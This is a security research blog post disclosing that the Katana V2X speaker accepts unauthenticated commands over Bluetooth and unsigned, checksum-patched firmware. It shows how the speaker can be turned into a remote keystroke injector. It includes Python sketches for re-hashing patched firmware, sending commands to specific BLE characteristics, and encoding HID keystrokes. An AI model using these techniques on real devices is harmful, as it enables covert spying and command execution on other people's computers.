Pwnd Blaster: Hacking your PC using your speaker without ever touching it
In my last post, I talked about reverse engineering the firmware of my new Creative Sound Blaster Katana V2X.

What initially started as simply wanting to write a Linux tool for communicating with my speaker ended up with me discovering vulnerabilities which allow any attacker within a ~15 m range of any Katana V2X to turn it into a covert spying tool and Rubber Ducky - all without ever having to pair with or physically touch the device.

CTP protocol background

As I explained in my previous post, the Katana V2X is a USB-connected PC sound bar. Because it's USB-connected, Creative has an app which allows you to change the settings of the speaker - the DSP, the LED configuration, the output source, and so on.

To do this, they use a custom protocol called CTP (short for Creative Transport Protocol, would be my guess). Basically, it seems to be a fairly simple proprietary protocol for sending various commands and reading the responses to them. I won't go into much detail here, but if you're interested, I described how it works in my last post.

What's important to note, however, is that in order to do anything with CTP over USB, you first have to do challenge-response authentication with the device. The key is static and can be derived from the binaries that ship with the Creative App. I'm unsure why this is even the case, but the speaker won't accept any commands until you've performed authentication. Fine.

Another thing that'll become important later is that firmware updates are also performed over CTP. That's how I initially got my hands on a firmware image - I sniffed the USB traffic using Wireshark and extracted the data from the captures.

Firmware analysis

The firmware container, which is also proprietary but is essentially a primitive Zip file, contains three parts of significant value.

First, there's FBOOT, which I previously presumed to be a bootloader (hence the name), but which also contains a sort of recovery mode for the speaker.
This recovery mode can be entered by holding down the SOURCE button while powering the device on, and allows you to recover from a bad state. This saved my device from being bricked many times, which I'm pretty grateful for.

The second part is FMAIN, which is the main firmware of the device. This runs when you boot the device "normally".
While FBOOT implements a lot of the same functionality as FMAIN (they both handle CTP commands, for example), FMAIN is about 6.5x larger than FBOOT.

Both FBOOT and FMAIN are based on a (fairly heavily modified) version of FreeRTOS, as hinted by a string present in the binaries: /home/jieyi/mcuos2.5/kernel/freertos-8.2.3/.

The last part of note is CHK2, which is a SHA-256 checksum over the entire firmware container, appended to the very end.

While not exactly shocking, considering the amount of effort that went into CTP authentication, I was a bit surprised to see that besides this CHK2 SHA-256 checksum, which was trivial to patch, there was no other protection in place for flashing firmware. I would've expected to find signature checks here, or at the very least a hashsum(secret_value + container_contents) type of protection. But after reimplementing the firmware upgrade functionality in my own tool, v2x-ctl, I found that the device happily accepts patched firmware as long as CHK2 is correct.

To test this, I made a pretty simple modification - I replaced the string WELCOME, which is shown on the device's segment display when booting up, with PATCHED. After flashing the firmware and rebooting the device, I was happy to see my string being shown to me.

The hacker part of me thinks this is great - people should be able to do what they want with the devices they've bought and own. The security professional part of me thinks that having absolutely no protection in place (like having to unlock a bootloader for mobile devices) is pretty bad practice.
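To make the checksum fix-up concrete, here is a minimal sketch of the idea rather than the actual v2x-ctl code. It assumes the digest is stored as the raw final 32 bytes and covers everything before it. The real CHK2 entry may carry its own header or cover a different range, so treat the layout, the function names and the toy container as hypothetical.

```python
import hashlib

DIGEST_LEN = hashlib.sha256().digest_size  # 32 bytes


def checksum_ok(container: bytes) -> bool:
    """Check the trailing digest (assumed layout: body || SHA-256(body))."""
    body, digest = container[:-DIGEST_LEN], container[-DIGEST_LEN:]
    return hashlib.sha256(body).digest() == digest


def patch_and_rehash(container: bytes, old: bytes, new: bytes) -> bytes:
    """Swap one same-length byte string and recompute the trailing digest."""
    if len(old) != len(new):
        raise ValueError("replacement must have the same length as the original")
    body = container[:-DIGEST_LEN]
    if body.count(old) != 1:
        raise ValueError("expected exactly one occurrence of the original bytes")
    patched = body.replace(old, new)
    return patched + hashlib.sha256(patched).digest()


# Toy stand-in for a firmware container, NOT the real format.
toy_body = b"\x00" * 16 + b"WELCOME" + b"\xff" * 16
toy_container = toy_body + hashlib.sha256(toy_body).digest()

patched_container = patch_and_rehash(toy_container, b"WELCOME", b"PATCHED")
```

WELCOME and PATCHED are both seven characters long, so the swap doesn't shift any offsets. Nothing in this step needs a secret, so anyone with the file can produce a container the device accepts.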
But it's not exactly the end of the world if you need physical access to update the device over USB.

If.

Everybody loves Bluetooth

Like all "self-respecting" speakers these days, of course the Katana V2X also needs to have Bluetooth, even though it's most likely going to spend most of its life wired up to a PC or gaming console.

And of course Creative needs to have an app which lets you control the speaker's settings and fancy LED lights from your phone over Bluetooth.
The way BLE (Bluetooth Low Energy) works is that each device exposes various registers (called GATT characteristics) that, once you're connected to the device, you can write to, read, subscribe to notifications for, and so on. What's important to note is that to connect to a device, you don't (necessarily) need to pair with it. You can often just connect to a device and immediately start reading and writing data to characteristics. Pairing establishes encryption, but a connection can be made without it.

While digging through the Katana's firmware, I discovered that the internal CTP handler is bridged to both USB and apparently Bluetooth.

Intrigued by this, I downloaded the Creative mobile app and tried connecting to my speaker.

"Please press the POWER button to pair."

I wondered how this pairing process worked, exactly. Maybe it used the same authentication scheme as for USB, and maybe I could just use the shared secret to authenticate with any speaker over Bluetooth, as was the case with my e-scooter.

I set up a Bluetooth sniffing environment and observed that in order to initiate the pairing process, the phone wrote a payload like 5a 0b... to the characteristic 9e9daaec-3a10-4fe8-b69f-7397aff77886, and read a response from the characteristic 9e9daaeb-3a10-4fe8-b69f-7397aff77886.

The leading 5a had me very, very suspicious, as it's the same byte that all CTP commands start with. On a hunch, I connected to the device over Bluetooth from my laptop and wrote the payload 5a 09 01 02, which is the CTP command for reading the firmware version, and which requires authentication when sent over USB.

To my surprise, upon reading the characteristic 9e9daaeb-3a10-4fe8-b69f-7397aff77886, I was greeted with the full version string. This means anyone can just connect to any Katana V2X over Bluetooth and start sending CTP commands to it, reading information, changing settings, etc.
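For illustration, the write-then-read described above could look roughly like the sketch below. It uses the third-party bleak library, which is an assumption on my part for this example and not necessarily the tooling used here. The two UUIDs and the 5a 09 01 02 payload are the ones quoted above, while the function name and the command-line handling are hypothetical. The response is returned as raw bytes because its exact framing isn't covered in this post.

```python
import asyncio
import sys

# Characteristics and payload as observed in the sniffed traffic.
CTP_WRITE_CHAR = "9e9daaec-3a10-4fe8-b69f-7397aff77886"
CTP_READ_CHAR = "9e9daaeb-3a10-4fe8-b69f-7397aff77886"
CTP_READ_FW_VERSION = bytes.fromhex("5a090102")


async def read_firmware_version(address: str) -> bytes:
    """Connect without pairing, send one CTP command, return the raw reply."""
    # bleak is a third-party package (pip install bleak); it is imported
    # lazily so the constants above can be used without it.
    from bleak import BleakClient

    async with BleakClient(address) as client:  # plain connection, no pairing
        await client.write_gatt_char(CTP_WRITE_CHAR, CTP_READ_FW_VERSION)
        return bytes(await client.read_gatt_char(CTP_READ_CHAR))


if __name__ == "__main__" and len(sys.argv) > 1:
    # Usage: python ctp_ble.py <device address>
    print(asyncio.run(read_firmware_version(sys.argv[1])))
```

Note what is missing: there is no pairing call, no key and no challenge-response step anywhere in this flow.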
Over-the-air updates (the bad kind)

It didn't take me too long to connect the dots: firmware upgrades are also performed over CTP. Combined with the fact that anyone can construct valid custom firmware, I wondered if it was possible for an attacker to simply upload custom firmware over Bluetooth without ever having to authenticate or pair.

After wrestling with a few BLE quirks (which I'll describe in detail later in this article), I wrote a relatively simple Python script that does exactly what my v2x-ctl tool does to upgrade firmware, but over Bluetooth instead. Using that, I attempted to upload the modified firmware I had crafted earlier to my speaker. Since BLE is quite slow, it took around 10 minutes to finish, but after it was done, I was once again greeted with my lovely "PATCHED" welcome message.

I thought of the implications for a bit. The speaker has a microphone. An attacker could, theoretically, upload custom firmware that effectively turns the speaker into a covert monitoring device, listening in on conversations and forwarding them to a receiver over Bluetooth.

What was more interesting to me was the fact that the speaker is, in a standard setup, connected to a PC over USB. It's by all means a trusted USB device.

What if we wrote custom firmware that forced the speaker into acting as a keyboard, sending keystrokes for opening up the terminal and executing arbitrary commands? We would turn the speaker into a Rubber Ducky, but remotely, without ever having to plug anything into either the speaker or the PC.

Living off the kernel land

At first, I thought this would be a herculean task.
Since I don't have access to the source code of the firmware, I would have to somehow jury-rig in three things: an entire section of code that sets the device up as a HID (human interface device) USB device (if that's even possible for this SoC), a procedure for using this to send keystrokes to the PC over USB, and a way to keep running the rest of the firmware so the speaker would still behave as normal.

However, after digging around some more in the firmware, I realized it's likely not as difficult as it seems.

First off, it turns out the speaker already sets itself up as a HID device.
Not as a full keyboard, mind you, but as a Consumer Control device - basically letting the speaker change the volume and media status (play/pause) on the PC, but not much else.

This could be seen in the kernel logs.

The way this is done with USB devices is that the device presents the PC with a USB descriptor set, which is basically a report of its capabilities: what it can do, how many interfaces to enumerate, and so on.

The report descriptor in the firmware was pretty easy to locate and, luckily for me, it had enough space to append a second report descriptor entry that also presented the device as a keyboard. Running dmesg now shows that the device also reports being a keyboard.

The second issue was sending actual HID data and emulating keystrokes. Luckily, the firmware already had a neatly usable routine for sending HID data. All I had to do was provide it with data (the key to press or release) and call it.

The third issue I struggled with quite a bit. It was difficult to find enough free space that I could write in (space which would get properly mapped in memory and wouldn't immediately crash the device when booting), to find a trampoline that worked properly and didn't crash when returning to the normal instruction flow, etc.

I eventually realized that if this is running on FreeRTOS, there are likely numerous tasks being executed on boot anyway. I don't need to write a trampoline and juggle the execution flow; I can just overwrite an existing task and let the firmware spawn it for me.
I ended up finding a diagnostic task which didn't seem to do anything in normal use - from what I could tell, it was only used for gathering diagnostic data from a DSP coprocessor.

I overwrote that task with a task that:

- Waits ~20 seconds for the speaker to boot and bring up the USB subsystem
- Types in echo pwned and hits enter, with ~20ms between each keystroke
- Ends the task, leaving the rest of the speaker's functionality intact

This would be executed every time the device booted up.

The patches ended up being pretty minimal - only 83 bytes for the USB report and 102 bytes of hand-written ARM/Thumb assembly for the keystroke injector, plus 2 bytes for every keystroke I wanted to send.
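To give a feel for the "2 bytes per keystroke" figure, here is a small sketch of how echo pwned plus enter could be encoded. The (modifier, usage ID) pair layout is an assumption made for this example, as the exact table format used in the patch isn't spelled out above. The usage IDs themselves come from the Keyboard/Keypad page of the USB HID Usage Tables and assume a US layout on the host. The function and constant names are hypothetical.

```python
# HID Keyboard/Keypad usage IDs (usage page 0x07), US layout.
KEY_A = 0x04  # 'a'..'z' map to 0x04..0x1D
KEY_ENTER = 0x28
KEY_SPACE = 0x2C

# Modifier bits as used in the first byte of a boot keyboard report.
MOD_NONE = 0x00
MOD_LEFT_SHIFT = 0x02


def encode_keystrokes(text: str) -> bytes:
    """Encode text as (modifier, usage ID) pairs - an assumed 2-byte format."""
    out = bytearray()
    for ch in text:
        if "a" <= ch <= "z":
            out += bytes((MOD_NONE, KEY_A + ord(ch) - ord("a")))
        elif "A" <= ch <= "Z":
            out += bytes((MOD_LEFT_SHIFT, KEY_A + ord(ch) - ord("A")))
        elif ch == " ":
            out += bytes((MOD_NONE, KEY_SPACE))
        elif ch == "\n":
            out += bytes((MOD_NONE, KEY_ENTER))
        else:
            raise ValueError(f"no mapping for {ch!r} in this sketch")
    return bytes(out)


payload = encode_keystrokes("echo pwned\n")
print(len(payload), payload.hex(" "))
```

With this encoding, the eleven keystrokes in echo pwned plus enter take 22 bytes. A real injector would also have to send a release (all-zero) report after each key press, which is what the ~20ms gap between keystrokes leaves room for.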